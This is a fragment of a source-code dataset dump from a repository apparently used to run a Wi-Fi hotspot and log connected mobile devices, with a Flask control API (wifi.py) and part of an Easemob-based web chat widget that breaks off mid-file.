上网的时间,单位为s,转换为int相减上\n mobiinfo['nettime'] = int(mobiinfo['offlinetime']) - int(mobiinfo['onlinetime'])\n mongo.insertmoibiinfo(mobiinfo)\n # 删除redis中已经存储在了mongodb的信息\n self.r.delete(name)\n continue\n"
},
{
"alpha_fraction": 0.6197183132171631,
"alphanum_fraction": 0.6287726163864136,
"avg_line_length": 27.68269157409668,
"blob_id": "1131f9bfbb239822e798e41f9834d52ddc3af56f",
"content_id": "c2fbbb979bc2b456107fa73c123a05f696f1ba87",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3032,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 104,
"path": "/wifi.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\nfrom flask import Flask, request, Response\nimport json\nimport gevent.monkey\nfrom gevent.pywsgi import WSGIServer\nimport threading\nfrom time import sleep\ngevent.monkey.patch_all()\n\napp = Flask(__name__)\n\nfrom terminal.switch import WEBSWITCH\nfrom terminal.mongooptions import mobidata\nfrom terminal.getallwifiname import IWWIFI\nfrom terminal.gethostapdfield import HOSTAPD\n\n\[email protected]('/api/allwlan', methods=['get'])\ndef getallwlan():\n iw = IWWIFI()\n info = {}\n wlanlist = iw.getallname()\n if len(wlanlist) == 0:\n info['wlan'] = wlanlist\n info['err'] = 'no wlan find, please check the mechine'\n else:\n info['wlan'] = wlanlist\n # info = {\"wlan\": ['wlan0', 'wlan1', 'wlan2']}\n return Response(json.dumps(info), mimetype=\"application/json\")\n\n\[email protected]('/api/whichwlan', methods=['post'])\ndef wlanname():\n args = json.loads(request.data)\n wlan = args['wlanname']\n # 改变wlan名字\n iw = IWWIFI()\n iw.rename(wlan)\n info = {\"changed\": 1}\n return Response(json.dumps(info), mimetype=\"application/json\")\n\n\[email protected]('/api/wificonf', methods=['post'])\ndef wificonf():\n args = json.loads(request.data)\n name = args['name']\n pwd = args['pwd']\n # 改变热点名字和密码\n iw = IWWIFI()\n iw.changewificonf(name, pwd)\n info = {\"changed\": 1}\n return Response(json.dumps(info), mimetype=\"application/json\")\n\n\[email protected]('/api/start', methods=['post'])\ndef start():\n args = json.loads(request.data)\n startcode = args['start']\n if int(startcode) == 1:\n # 调用开始函数\n # print 'start the mobi info collection'\n switch = WEBSWITCH()\n thread1 = threading.Thread(target=switch.startallshell)\n mobi = HOSTAPD()\n thread2 = threading.Thread(target=mobi.startcollect)\n thread1.start()\n thread2.start()\n # thread1.join()\n # thread2.join()\n info = {\"started\": 1}\n else:\n info = {\"started\": 0, \"erro\": \"something wrong with the data.\"}\n return Response(json.dumps(info), mimetype=\"applicarion/json\")\n\n\[email protected]('/api/shutdown', methods=['post'])\ndef stop():\n args = json.loads(request.data)\n stopcode = args['stop']\n stopwlan = args['wlanname']\n if int(stopcode) == 1:\n # 调用停止函数\n # print \"stop the mobi info collection\"\n switch = WEBSWITCH()\n switch.shutdowntheshell(stopwlan)\n info = {\"stopcode\": 1}\n else:\n info = {\"stopcode\": 0, \"erro\": \"something wrong with the data.\"}\n return Response(json.dumps(info), mimetype=\"application/json\")\n\n\[email protected]('/api/mobiinfo', methods=['get'])\ndef querymobidata():\n data = json.dumps(mobidata())\n return Response(data, mimetype=\"application/json\")\n\n\nif __name__ == '__main__':\n http_server = WSGIServer(('0.0.0.0', 8015), app)\n try:\n print(\"Start at\" + http_server.server_host + ':' + str(http_server.server_port))\n http_server.serve_forever()\n except(KeyboardInterrupt):\n print('Exit......')"
},
{
"alpha_fraction": 0.4719010591506958,
"alphanum_fraction": 0.4749012291431427,
"avg_line_length": 43.63105010986328,
"blob_id": "66fde0d8d04533ceea19ca363f89256d5d836e6c",
"content_id": "9f7529b71b5b16e9cd117c53978f3ff7b9977cc3",
"detected_licenses": [
"Apache-2.0",
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 56745,
"license_type": "permissive",
"max_line_length": 662,
"num_lines": 1198,
"path": "/static/js/layer/layim/layim.easemob.js",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "Easemob.im.config = {\r\n xmppURL: 'im-api.easemob.com',\r\n apiURL: 'http://a1.easemob.com',\r\n appkey: \"ehand#ehand\",\r\n https: false,\r\n multiResources: true\r\n}\r\nDate.prototype.ToFormat = function (fmt) {\r\n var o = {\r\n \"M+\": this.getMonth() + 1,\r\n \"d+\": this.getDate(),\r\n \"h+\": this.getHours(),\r\n \"m+\": this.getMinutes(),\r\n \"s+\": this.getSeconds(),\r\n \"q+\": Math.floor((this.getMonth() + 3) / 3),\r\n \"S\": this.getMilliseconds()\r\n };\r\n if (/(y+)/.test(fmt))\r\n fmt = fmt.replace(RegExp.$1, (this.getFullYear() + \"\").substr(4 - RegExp.$1.length));\r\n for (var k in o)\r\n if (new RegExp(\"(\" + k + \")\").test(fmt))\r\n fmt = fmt.replace(RegExp.$1, (RegExp.$1.length == 1) ?\r\n\t\t\t\t(o[k]) : ((\"00\" + o[k]).substr((\"\" + o[k]).length)));\r\n return fmt;\r\n}\r\nvar layim = { easemob: {} };\r\nlayim.easemob.conn = new Easemob.im.Connection({\r\n multiResources: Easemob.im.config.multiResources,\r\n https: Easemob.im.config.https,\r\n url: Easemob.im.config.xmppURL\r\n});\r\n//初始化连接\r\nlayim.easemob.conn.init({\r\n https: Easemob.im.config.https,\r\n url: Easemob.im.config.xmppURL,\r\n //当连接成功时的回调方法\r\n onOpened: function () {\r\n if (layim.easemob.conn.isOpened())\r\n layim.easemob.conn.heartBeat(layim.easemob.conn);\r\n layim.easemob.xxim.online();\r\n layim.easemob.conn.setPresence();\r\n layim.easemob.conn.getRoster({\r\n success: function (roster) {\r\n layim.easemob.xxim.showuser(roster);\r\n }\r\n });\r\n },\r\n //当连接关闭时的回调方法\r\n onClosed: function () {\r\n layim.easemob.xxim.offline();\r\n },\r\n //收到文本消息时的回调方法\r\n onTextMessage: function (message) {\r\n if (message.ext && message.ext.time) message.time = message.ext.time;\r\n layim.easemob.xxim.showhistory(message);\r\n },\r\n //收到表情消息时的回调方法\r\n onEmotionMessage: function (message) {\r\n if (message.ext && message.ext.time) message.time = message.ext.time;\r\n var h = '';\r\n $(message.data).each(function (i, item) {\r\n if (item.type = 'emotion')\r\n h += '<img src=\"' + item.data + '\" />';\r\n else if (item.type = 'txt')\r\n h += item.data;\r\n });\r\n message.data = h;\r\n layim.easemob.xxim.showhistory(message);\r\n },\r\n //收到图片消息时的回调方法\r\n onPictureMessage: function (message) {\r\n if (message.ext && message.ext.time) message.time = message.ext.time;\r\n message.data = '<a href=\"' + message.url + '\" target=\"_blank\"><img src=\"' + message.url + '\" /></a>';\r\n layim.easemob.xxim.showhistory(message);\r\n },\r\n //收到音频消息的回调方法\r\n onAudioMessage: function (message) { },\r\n //收到位置消息的回调方法\r\n onLocationMessage: function (message) { },\r\n //收到文件消息的回调方法\r\n onFileMessage: function (message) { },\r\n //收到视频消息的回调方法\r\n onVideoMessage: function (message) { },\r\n //收到联系人订阅请求的回调方法\r\n onPresence: function (message) {\r\n layim.easemob.xxim.showpresence(message);\r\n },\r\n //收到联系人消息的回调方法\r\n onRoster: function (message) {\r\n layim.easemob.conn.getRoster({\r\n success: function (roster) {\r\n layim.easemob.xxim.showuser(roster);\r\n }\r\n });\r\n },\r\n //收到群组邀请时的回调方法\r\n onInviteMessage: function (message) { },\r\n //异常时的回调方法\r\n onError: function (message) {\r\n layim.easemob.conn.curError = message;\r\n },\r\n //发送接收到消息\r\n onSendReceiptsMessage: function (message) {\r\n return false;\r\n },\r\n //透传消息\r\n onCmdMessage: function (message) {\r\n if (message.ext && message.ext.time) message.time = message.ext.time;\r\n for (var key in message.ext) {\r\n var value = message.ext[key];\r\n if (key == 'orderno')\r\n message.action = message.action.replace('[orderno]', '[<a 
href=\"/Shop/Order/Info?bllno=' + value + '\" class=\"color-main\" target=\"_blank\">' + value + '</a>]');\r\n else if (key == 'refundno')\r\n message.action = message.action.replace('[refundno]', '[<a href=\"/Shop/Order/Refund?bllno=' + message.ext['orderno'] + '\" class=\"color-main\" target=\"_blank\">' + value + '</a>]');\r\n else if (key == 'returnno')\r\n message.action = message.action.replace('[returnno]', '[<a href=\"/Shop/Order/Return?bllno=' + message.ext['orderno'] + '&bcd=' + message.ext['bcd'] + '\" class=\"color-main\" target=\"_blank\">' + value + '</a>]');\r\n else if (key == 'sendno')\r\n message.action = message.action.replace('[sendno]', '[<a href=\"/Shop/Order/Send?bllno=' + message.ext['orderno'] + '&bcd=' + message.ext['bcd'] + '\" class=\"color-main\" target=\"_blank\">' + value + '</a>]');\r\n }\r\n message.data = message.action;\r\n layim.easemob.xxim.showhistory(message);\r\n }\r\n});\r\nlayim.easemob.conn.login = function (user, pwd) {\r\n layim.easemob.conn.open({\r\n apiUrl: Easemob.im.config.apiURL,\r\n user: user,\r\n pwd: pwd,\r\n appKey: Easemob.im.config.appkey\r\n });\r\n layim.easemob.conn.lastuser = user;\r\n layim.easemob.conn.lastpwd = pwd;\r\n layim.easemob.conn.stopInterval();\r\n layim.easemob.conn.myInterval = window.setInterval(function () {\r\n if (!layim.easemob.conn.isOpened() && !layim.easemob.conn.isOpening()) {\r\n layim.easemob.xxim.rconnect();\r\n }\r\n }, 2000);\r\n}\r\nlayim.easemob.conn.logout = function () {\r\n layim.easemob.conn.stopHeartBeat(layim.easemob.conn);\r\n layim.easemob.conn.close();\r\n}\r\nlayim.easemob.conn.stopInterval = function () {\r\n if (layim.easemob.conn.myInterval) {\r\n window.clearInterval(layim.easemob.conn.myInterval);\r\n layim.easemob.conn.myInterval = null;\r\n }\r\n}\r\nlayim.easemob.init = function (id, appkey, token, name, photo) {\r\n Easemob.im.config.appkey = appkey;\r\n layim.easemob.conn.login(id, token);\r\n var config = {\r\n msgurl: 'mailbox.html?msg=',\r\n chatlogurl: 'mailbox.html?user=',\r\n aniTime: 200,\r\n right: -230,\r\n api: {\r\n friend: 'js/plugins/layer/layim/data/friend.json', //好友列表接口\r\n group: 'js/plugins/layer/layim/data/group.json', //群组列表接口\r\n chatlog: 'js/plugins/layer/layim/data/chatlog.json', //聊天记录接口\r\n groups: 'js/plugins/layer/layim/data/groups.json', //群组成员接口\r\n sendurl: '' //发送消息接口\r\n },\r\n user: { //当前用户信息\r\n name: name,\r\n face: photo\r\n },\r\n //自动回复内置文案,也可动态读取数据库配置\r\n autoReplay: [\r\n '您好,我现在有事不在,一会再和您联系。',\r\n '你没发错吧?',\r\n '洗澡中,请勿打扰,偷窥请购票,个体四十,团体八折,订票电话:一般人我不告诉他!',\r\n '你好,我是主人的美女秘书,有什么事就跟我说吧,等他回来我会转告他的。',\r\n '我正在拉磨,没法招呼您,因为我们家毛驴去动物保护协会把我告了,说我剥夺它休产假的权利。',\r\n '<(@ ̄︶ ̄@)>',\r\n '你要和我说话?你真的要和我说话?你确定自己想说吗?你一定非说不可吗?那你说吧,这是自动回复。',\r\n '主人正在开机自检,键盘鼠标看好机会出去凉快去了,我是他的电冰箱,我打字比较慢,你慢慢说,别急……',\r\n '(*^__^*) 嘻嘻,是贤心吗?'\r\n ],\r\n chating: {},\r\n chatmsg: {},\r\n chatuser: {},\r\n presences: [],\r\n hosts: (function () {\r\n var dk = location.href.match(/\\:\\d+/);\r\n dk = dk ? dk[0] : '';\r\n return 'http://' + document.domain + dk + '/';\r\n })(),\r\n json: function (url, data, callback, error) {\r\n return $.ajax({\r\n type: 'POST',\r\n url: url,\r\n data: data,\r\n dataType: 'json',\r\n success: callback,\r\n error: error\r\n });\r\n },\r\n stopMP: function (e) {\r\n e ? 
e.stopPropagation() : e.cancelBubble = true;\r\n }\r\n }, dom = [$(window), $(document), $('html'), $('body')], xxim = {};\r\n layim.easemob.xxim = xxim;\r\n xxim.rconnect = function () {\r\n xxim.node.rconnect.html('').addClass('loading');\r\n layim.easemob.conn.login(id, token);\r\n }\r\n xxim.offline = function () {\r\n xxim.node.onlinetex.html('离线');\r\n xxim.node.online.addClass('xxim_offline');\r\n xxim.node.rconnect.removeClass('loading').html('重连');\r\n xxim.node.layimMin.parent().addClass('xxim_bottom_offline')\r\n if (xxim.layimNode.attr('state') != '1') xxim.expend();\r\n if (xxim.chatbox) xxim.chatbox.find('.layim_close').click();\r\n if (xxim.presencebox) layer.close(xxim.presencebox.parent().parent().attr('times'));\r\n xxim.node.list.find('.xxim_chatlist').html('');\r\n config.chatmsg = {};\r\n config.presences = [];\r\n xxim.showcount();\r\n }\r\n xxim.online = function () {\r\n xxim.node.onlinetex.html('在线');\r\n xxim.node.online.removeClass('xxim_offline');\r\n xxim.node.list.removeClass('loading');\r\n xxim.node.layimMin.parent().removeClass('xxim_bottom_offline');\r\n xxim.gochat();\r\n }\r\n //主界面tab\r\n xxim.tabs = function (index) {\r\n var node = xxim.node;\r\n node.tabs.eq(index).addClass('xxim_tabnow').siblings().removeClass('xxim_tabnow');\r\n node.list.eq(index).show().siblings('.xxim_list').hide();\r\n if (node.list.eq(index).find('li').length === 0) {\r\n }\r\n };\r\n\r\n //节点\r\n xxim.renode = function () {\r\n var node = xxim.node = {\r\n tabs: $('#xxim_tabs>span'),\r\n list: $('.xxim_list'),\r\n online: $('.xxim_online'),\r\n setonline: $('.xxim_setonline'),\r\n onlinetex: $('#xxim_onlinetex'),\r\n xximon: $('#xxim_on'),\r\n layimFooter: $('#xxim_bottom'),\r\n xximHide: $('#xxim_hide'),\r\n xximSearch: $('#xxim_searchkey'),\r\n searchMian: $('#xxim_searchmain'),\r\n closeSearch: $('#xxim_closesearch'),\r\n layimMin: $('#xxim_mymsg'),\r\n rconnect: $('#xxim_rconnect')\r\n };\r\n };\r\n\r\n //主界面缩放\r\n xxim.expend = function () {\r\n if (layim.easemob.noexpend) return;\r\n var node = xxim.node;\r\n if (xxim.layimNode.attr('state') !== '1') {\r\n xxim.layimNode.stop().animate({ right: config.right }, config.aniTime, function () {\r\n node.xximon.addClass('xxim_off');\r\n try {\r\n localStorage.layimState = 1;\r\n } catch (e) { }\r\n xxim.layimNode.attr({ state: 1 });\r\n node.xximHide.addClass('xxim_show');\r\n });\r\n node.layimFooter.addClass('xxim_expend').stop().animate({ marginLeft: config.right }, config.aniTime);\r\n } else {\r\n xxim.layimNode.stop().animate({ right: 0 }, config.aniTime, function () {\r\n node.xximon.removeClass('xxim_off');\r\n try {\r\n localStorage.layimState = 2;\r\n } catch (e) { }\r\n xxim.layimNode.removeAttr('state');\r\n node.layimFooter.removeClass('xxim_expend');\r\n node.xximHide.removeClass('xxim_show');\r\n });\r\n node.layimFooter.stop().animate({ marginLeft: 0 }, config.aniTime);\r\n }\r\n };\r\n\r\n //初始化窗口格局\r\n xxim.layinit = function () {\r\n if (!layim.easemob.noexpend) {\r\n var node = xxim.node;\r\n xxim.layimNode.attr({ state: 1 }).css({ right: config.right });\r\n node.xximon.addClass('xxim_off');\r\n node.layimFooter.addClass('xxim_expend').css({ marginLeft: config.right });\r\n node.xximHide.addClass('xxim_show');\r\n }\r\n ////主界面\r\n //try {\r\n // if (!localStorage.layimState)\r\n // localStorage.layimState = 1;\r\n // if (localStorage.layimState === '1') {\r\n // xxim.layimNode.attr({ state: 1 }).css({ right: config.right });\r\n // node.xximon.addClass('xxim_off');\r\n // 
node.layimFooter.addClass('xxim_expend').css({ marginLeft: config.right });\r\n // node.xximHide.addClass('xxim_show');\r\n // }\r\n //} catch (e) {\r\n //}\r\n xxim.tabs(2);\r\n };\r\n xxim.getobjecturl = function (file) {\r\n var url = null;\r\n if (window.createObjectURL != undefined) { // basic\r\n url = window.createObjectURL(file);\r\n } else if (window.URL != undefined) { // mozilla(firefox)\r\n url = window.URL.createObjectURL(file);\r\n } else if (window.webkitURL != undefined) { // webkit or chrome\r\n url = window.webkitURL.createObjectURL(file);\r\n }\r\n return url;\r\n };\r\n //聊天窗口\r\n xxim.popchat = function (param) {\r\n var node = xxim.node, log = {};\r\n\r\n log.success = function (layero) {\r\n xxim.chatbox = layero.find('#layim_chatbox');\r\n log.chatlist = xxim.chatbox.find('.layim_chatmore>ul');\r\n\r\n log.chatlist.html('<li data-id=\"' + param.id + '\" type=\"' + param.type + '\" id=\"layim_user' + param.type + param.id + '\"><span>' + param.name + '</span><em>×</em></li>')\r\n xxim.tabchat(param, xxim.chatbox);\r\n\r\n //最小化聊天窗\r\n xxim.chatbox.find('.layer_setmin').on('click', function () {\r\n layero.hide();\r\n node.layimMin.parent().removeClass('xxim_bottom_3');\r\n //node.layimMin.show();\r\n xxim.ischating = false;\r\n });\r\n\r\n //关闭窗口\r\n xxim.chatbox.find('.layim_close').on('click', function () {\r\n layer.close(layero.attr('times'));\r\n xxim.chatbox = null;\r\n config.chating = {};\r\n config.chatings = 0;\r\n xxim.ischating = false;\r\n });\r\n var addimage = xxim.chatbox.find('.layim_addimage');\r\n if (!Easemob.im.Helper.isCanUploadFileAsync) addimage.hide();\r\n //图片\r\n addimage.on('click', function () {\r\n if (!config.imageinput) {\r\n config.imageinput = $('<input type=\"file\" id=\"layim_imageinput\" style=\"display:none;\"/>');\r\n $(document.body).append(config.imageinput);\r\n config.imageinput.on('change', function () {\r\n var fileObj = Easemob.im.Helper.getFileUrl('layim_imageinput');\r\n if (!fileObj.url) return common.msg('请先选择图片!');\r\n if (['jpg', 'gif', 'png', 'bmp'].indexOf(fileObj.filetype) < 0) return common.msg('不支持此图片类型' + fileObj.filetype + '!');\r\n var layerindex = common.load();\r\n var time = xxim.gettime();\r\n var opt = {\r\n type: 'chat',\r\n fileInputId: 'layim_imageinput',\r\n filename: fileObj.filename,\r\n to: xxim.nowchat.id,\r\n apiUrl: Easemob.im.config.apiURL,\r\n onFileUploadError: function (error) {\r\n layer.close(layerindex);\r\n common.msg('发送图片失败!');\r\n },\r\n onFileUploadComplete: function (data) {\r\n console.log(data);\r\n layer.close(layerindex);\r\n var file = document.getElementById('layim_imageinput');\r\n var url = xxim.getobjecturl(file.files[0]);\r\n xxim.showmsg({\r\n id: xxim.nowchat.id,\r\n type: xxim.nowchat.type,\r\n time: time,\r\n name: config.user.name,\r\n face: config.user.face,\r\n content: '<a href=\"' + data.uri + '/' + data.entities[0].uuid + '\" target=\"_blank\"><img src=\"' + url + '\" /></a>'\r\n }, 'me');\r\n }, ext: { time: time }\r\n };\r\n layim.easemob.conn.sendPicture(opt);\r\n });\r\n }\r\n config.imageinput.click();\r\n });\r\n //表情\r\n xxim.chatbox.find('.layim_addface').on('click', function () {\r\n //var offset = $(layero).offset();\r\n var color = 'transparent';\r\n if (navigator.appName == 'Microsoft Internet Explorer' && navigator.appVersion.split(';')[1].replace(/[ ]/g, '') == 'MSIE9.0') {\r\n color = '#ddd';\r\n }\r\n var top = parseFloat(layero.css('top'));\r\n var left = parseFloat(layero.css('left'));\r\n if (!config.facehtml) {\r\n var h = '<ul 
class=\"layim_face_list\">';\r\n var data = Easemob.im.EMOTIONS.map;\r\n var path = Easemob.im.EMOTIONS.path;\r\n for (var key in data) {\r\n var src = path + data[key];\r\n h += '<li class=\"layim_face_item\" data-face=\"' + key + '\" data-src=\"' + src + '\"><img src=\"' + src + '\"/></li>';\r\n }\r\n h += '</ul>';\r\n config.facehtml = h;\r\n }\r\n layer.open({\r\n type: 1,\r\n title: false,\r\n skin: 'layui-layerim-face',\r\n closeBtn: false, //不显示关闭按钮\r\n shift: 0,\r\n move: false,\r\n shade: [0.1, color],\r\n shadeClose: true, //开启遮罩关闭\r\n offset: [(top + 356) + 'px', left + 'px'],\r\n area: ['432px', '135px'],\r\n border: false,\r\n content: config.facehtml,\r\n success: function (facelayer) {\r\n facelayer.on('click', '.layim_face_item', function () {\r\n layer.close(facelayer.attr('times'));\r\n var face = $(this).attr('data-face');\r\n var time = xxim.gettime();\r\n var src = $(this).attr('data-src');\r\n layim.easemob.conn.sendTextMessage({ to: xxim.nowchat.id, msg: face, type: \"chat\", ext: { time: time } });\r\n xxim.showmsg({\r\n id: xxim.nowchat.id,\r\n type: xxim.nowchat.type,\r\n time: time,\r\n name: config.user.name,\r\n face: config.user.face,\r\n content: '<img src=\"' + src + '\" />'\r\n }, 'me');\r\n });\r\n }\r\n });\r\n });\r\n //关闭某个聊天\r\n log.chatlist.on('mouseenter', 'li', function () {\r\n $(this).find('em').show();\r\n }).on('mouseleave', 'li', function () {\r\n $(this).find('em').hide();\r\n });\r\n log.chatlist.on('click', 'li em', function (e) {\r\n var parents = $(this).parent(), dataType = parents.attr('type');\r\n var dataId = parents.attr('data-id'), index = parents.index();\r\n var chatlist = log.chatlist.find('li'), indexs;\r\n\r\n config.stopMP(e);\r\n\r\n delete config.chating[dataType + dataId];\r\n config.chatings--;\r\n\r\n parents.remove();\r\n $('#layim_area' + dataType + dataId).remove();\r\n if (dataType === 'group') {\r\n $('#layim_group' + dataType + dataId).remove();\r\n }\r\n\r\n if (parents.hasClass('layim_chatnow')) {\r\n if (index === config.chatings) {\r\n indexs = index - 1;\r\n } else {\r\n indexs = index + 1;\r\n }\r\n xxim.tabchat(config.chating[chatlist.eq(indexs).attr('type') + chatlist.eq(indexs).attr('data-id')]);\r\n }\r\n\r\n if (log.chatlist.find('li').length === 1) {\r\n log.chatlist.parent().hide();\r\n }\r\n });\r\n\r\n //聊天选项卡\r\n log.chatlist.on('click', 'li', function () {\r\n var othis = $(this), dataType = othis.attr('type'), dataId = othis.attr('data-id');\r\n xxim.tabchat(config.chating[dataType + dataId]);\r\n });\r\n\r\n //发送热键切换\r\n log.sendType = $('#layim_sendtype'), log.sendTypes = log.sendType.find('span');\r\n $('#layim_enter').on('click', function (e) {\r\n config.stopMP(e);\r\n log.sendType.show();\r\n });\r\n log.sendTypes.on('click', function () {\r\n log.sendTypes.find('i').removeClass('fa-check');\r\n $(this).find('i').addClass('fa-check');\r\n });\r\n\r\n xxim.transmit();\r\n };\r\n\r\n log.html = '<div class=\"layim_chatbox\" id=\"layim_chatbox\">'\r\n + '<h6>'\r\n + '<span class=\"layim_move\"></span>'\r\n + ' <a href=\"javascript:layim.easemob.xxim.showuserinfo(layim.easemob.xxim.nowchat.id);\" class=\"layim_face\" target=\"_blank\"><img src=\"' + param.face + '\" ></a>'\r\n + ' <a href=\"javascript:layim.easemob.xxim.showuserinfo(layim.easemob.xxim.nowchat.id);\" class=\"layim_names\" target=\"_blank\">' + param.name + '</a>'\r\n + ' <span class=\"layim_rightbtn\">'\r\n + ' <i class=\"layer_setmin\">—</i>'\r\n + ' <i class=\"layim_close\">×</i>'\r\n + ' </span>'\r\n + '</h6>'\r\n + '<div 
class=\"layim_chatmore\" id=\"layim_chatmore\">'\r\n + ' <ul class=\"layim_chatlist\"></ul>'\r\n + '</div>'\r\n + '<div class=\"layim_groups\" id=\"layim_groups\"></div>'\r\n + '<div class=\"layim_chat\">'\r\n + ' <div class=\"layim_chatarea\" id=\"layim_chatarea\">'\r\n + ' <ul class=\"layim_chatview layim_chatthis\" id=\"layim_area' + param.type + param.id + '\"></ul>'\r\n + ' </div>'\r\n + ' <div class=\"layim_tool\">'\r\n + ' <i class=\"layim_addface fa fa-meh-o\" title=\"发送表情\"></i>'\r\n + ' <i class=\"layim_addimage fa fa-picture-o\" title=\"上传图片\"></i>'\r\n //+ ' <a href=\"javascript:void(0);\"><i class=\"layim_addfile fa fa-paperclip\" title=\"上传附件\"></i></a>'\r\n //+ ' <a href=\"javascript:void(0);\" target=\"_blank\" class=\"layim_seechatlog\"><i class=\"fa fa-comment-o\"></i>聊天记录</a>'\r\n + ' </div>'\r\n + ' <textarea class=\"layim_write\" id=\"layim_write\"></textarea>'\r\n + ' <div class=\"layim_send\">'\r\n + ' <div class=\"layim_sendbtn\" id=\"layim_sendbtn\">发送<span class=\"layim_enter\" id=\"layim_enter\"><em class=\"layim_zero\"></em></span></div>'\r\n + ' <div class=\"layim_sendtype\" id=\"layim_sendtype\">'\r\n + ' <span><i class=\"fa fa-check\"></i>按Enter键发送</span>'\r\n + ' <span><i class=\"fa\"></i>按Ctrl+Enter键发送</span>'\r\n + ' </div>'\r\n + ' </div>'\r\n + '</div>'\r\n + '</div>';\r\n if (config.chatings < 1) {\r\n layer.open({\r\n type: 1,\r\n border: [0],\r\n title: false,\r\n shade: false,\r\n skin: 'layui-layerim',\r\n area: ['620px', '492px'],\r\n move: '.layim_chatbox .layim_move',\r\n moveType: 1,\r\n closeBtn: false,\r\n zIndex: layer.zIndex,\r\n offset: [(($(window).height() - 493) / 2) + 'px', ''],\r\n content: log.html,\r\n success: function (layero) {\r\n log.success(layero);\r\n }\r\n });\r\n } else {\r\n log.chatmore = xxim.chatbox.find('#layim_chatmore');\r\n log.chatarea = xxim.chatbox.find('#layim_chatarea');\r\n\r\n log.chatmore.show();\r\n\r\n log.chatmore.find('ul>li').removeClass('layim_chatnow');\r\n log.chatmore.find('ul').append('<li data-id=\"' + param.id + '\" type=\"' + param.type + '\" id=\"layim_user' + param.type + param.id + '\" class=\"layim_chatnow\"><span>' + param.name + '</span><em>×</em></li>');\r\n\r\n log.chatarea.find('.layim_chatview').removeClass('layim_chatthis');\r\n log.chatarea.append('<ul class=\"layim_chatview layim_chatthis\" id=\"layim_area' + param.type + param.id + '\"></ul>');\r\n\r\n xxim.tabchat(param);\r\n }\r\n\r\n //群组\r\n log.chatgroup = xxim.chatbox.find('#layim_groups');\r\n if (param.type === 'group') {\r\n log.chatgroup.find('ul').removeClass('layim_groupthis');\r\n log.chatgroup.append('<ul class=\"layim_groupthis\" id=\"layim_group' + param.type + param.id + '\"></ul>');\r\n xxim.getGroups(param);\r\n }\r\n //点击群员切换聊天窗\r\n log.chatgroup.on('click', 'ul>li', function () {\r\n xxim.popchatbox($(this));\r\n });\r\n };\r\n xxim.settop = function ($obj) {\r\n layer.zIndex++;\r\n $obj.css('z-index', layer.zIndex);\r\n };\r\n //显示用户信息\r\n xxim.showuserinfo = function (id) {\r\n var $infobox = $('#layim_chatbox_info_' + id);\r\n if ($infobox.length) return xxim.settop($infobox.parent().parent());\r\n var node = xxim.node, log = {};\r\n var param = $.extend({ from: id }, xxim.getinfo(id, function (id, info) {\r\n xxim.setuserinfo(id, info);\r\n }));\r\n log.success = function (layero) {\r\n xxim.setuserinfo(id, $.extend({ from: id }, xxim.getinfo(id)));\r\n layero.find('.layim_close').on('click', function () {\r\n layer.close(layero.attr('times'));\r\n });\r\n layero.find('.layim_chatinfo_chatuser').on('click', 
function () {\r\n xxim.inchat($.extend({ from: id }, xxim.getinfo(id)));\r\n if (xxim.chatbox) xxim.settop(xxim.chatbox.parent().parent());\r\n });\r\n layero.find('.layim_chatinfo_adduser').on('click', function () {\r\n layer.confirm('<input class=\"layui-layer-text\" type=\"text\" placeholder=\"验证信息\" />', {\r\n title: '添加好友',\r\n btn: ['确定', '取消'],\r\n zIndex: layer.zIndex,\r\n skin: 'layui-layerim-dialog',\r\n shade: false,\r\n moveType: 1\r\n }, function (i, obj) {\r\n var val = obj.find('.layui-layer-text').val();\r\n layim.easemob.conn.subscribe({\r\n to: id,\r\n message: val\r\n });\r\n layer.msg('请求发送成功!', { zIndex: layer.zIndex });\r\n });\r\n });\r\n layero.find('.layim_chatinfo_deleteuser').on('click', function () {\r\n layer.confirm('是否删除好友?', {\r\n btn: ['删除', '取消'],\r\n zIndex: layer.zIndex,\r\n skin: 'layui-layerim-dialog',\r\n shade: false,\r\n moveType: 1\r\n }, function () {\r\n layim.easemob.conn.removeRoster({\r\n to: id,\r\n success: function () {\r\n layer.msg('删除成功!', { zIndex: layer.zIndex });\r\n layim.easemob.conn.unsubscribed({\r\n to: id\r\n });\r\n }\r\n });\r\n });\r\n });\r\n };\r\n log.html = '<div class=\"layim_chatbox layim_chatbox_info\" id=\"layim_chatbox_info_' + id + '\">'\r\n + '<h6>'\r\n + '<span class=\"layim_move\"></span>'\r\n + ' <a href=\"javascript:void(0);\" class=\"layim_face\" target=\"_blank\"><img class=\"layim_chatinfo_face\" src=\"' + param.face + '\" ></a>'\r\n + ' <div class=\"layim_rightinfos\">'\r\n + ' <div><span class=\"layim_chatinfo_name\">' + param.name + '</span><i class=\"fa fa-user layim_chatinfo_sex\" style=\"color:#4CAE4C;line-height:1.33em;margin-left:5px;display:none;\"></i></div>'\r\n + ' <div>用户号:<span class=\"layim_chatinfo_id\">' + id + '</span></div>'\r\n + ' <div>积分:<span class=\"layim_chatinfo_intg\">' + (param.intg || 0) + '</span></div>'\r\n + ' </div>'\r\n + ' <span class=\"layim_rightbtn\">'\r\n + ' <i class=\"layim_close\">×</i>'\r\n + ' </span>'\r\n + '</h6>'\r\n + '<div class=\"layim_chatinfo\">'\r\n + ' <div>电话号码:<span class=\"layim_chatinfo_phone\">' + (param.phone || '') + '</span></div>'\r\n + ' <div>地 区:<span class=\"layim_chatinfo_city\">' + (param.province || '') + (param.city || '') + (param.district || '') + '</span></div>'\r\n + '</div>'\r\n + '<div class=\"layim_chatinfo_bottom\">'\r\n + ' <div class=\"layim_chatinfo_btn layim_chatinfo_chatuser\">发送消息</div>'\r\n + ' <div class=\"layim_chatinfo_btn layim_chatinfo_adduser\">添加好友</div>'\r\n + ' <div class=\"layim_chatinfo_btn layim_chatinfo_deleteuser\" style=\"display:none;\">删除好友</div>'\r\n + '</div>'\r\n + '</div>';\r\n layer.open({\r\n type: 1,\r\n border: [0],\r\n title: false,\r\n shade: false,\r\n skin: 'layui-layerim',\r\n area: ['300px', '492px'],\r\n move: '.layim_chatbox .layim_move',\r\n zIndex: layer.zIndex,\r\n moveType: 1,\r\n closeBtn: false,\r\n offset: [(($(window).height() - 493) / 2) + 'px', ''],\r\n content: log.html,\r\n success: function (layero) {\r\n log.success(layero);\r\n }\r\n });\r\n };\r\n //得到好友信息\r\n 